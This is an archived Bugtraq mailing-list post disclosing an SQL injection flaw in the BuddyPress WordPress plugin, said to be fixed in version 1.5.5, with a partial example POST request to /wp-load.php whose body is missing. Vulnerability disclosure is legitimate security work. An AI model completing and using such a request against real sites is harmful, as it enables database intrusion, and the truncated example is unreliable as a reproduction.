Home page logo

bugtraq logo Bugtraq mailing list archives

SQL injection in Wordpress plugin Buddypress
From: ivan_terkin () yahoo com
Date: Sat, 31 Mar 2012 17:27:57 GMT


I would like disclosure SQL injection vulnerability if Buddypress plugin affecting last versions. This issue was 
reported to developers and resolved in 1.5.5 version. So, I suggest all having this plugin in their blogs update to 
last version, if you haven't done it yet. Example of POST message with sql injection is below.

POST /wp-load.php HTTP/1.1
User-Agent: Mozilla
Host: example.com
Accept: */*
Referer: http://example.com/activity/?s=b
Connection: Keep-Alive
Content-Length: 153
Content-Type: application/x-www-form-urlencoded


  By Date           By Thread  

Current thread:
  • SQL injection in Wordpress plugin Buddypress ivan_terkin (Apr 04)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]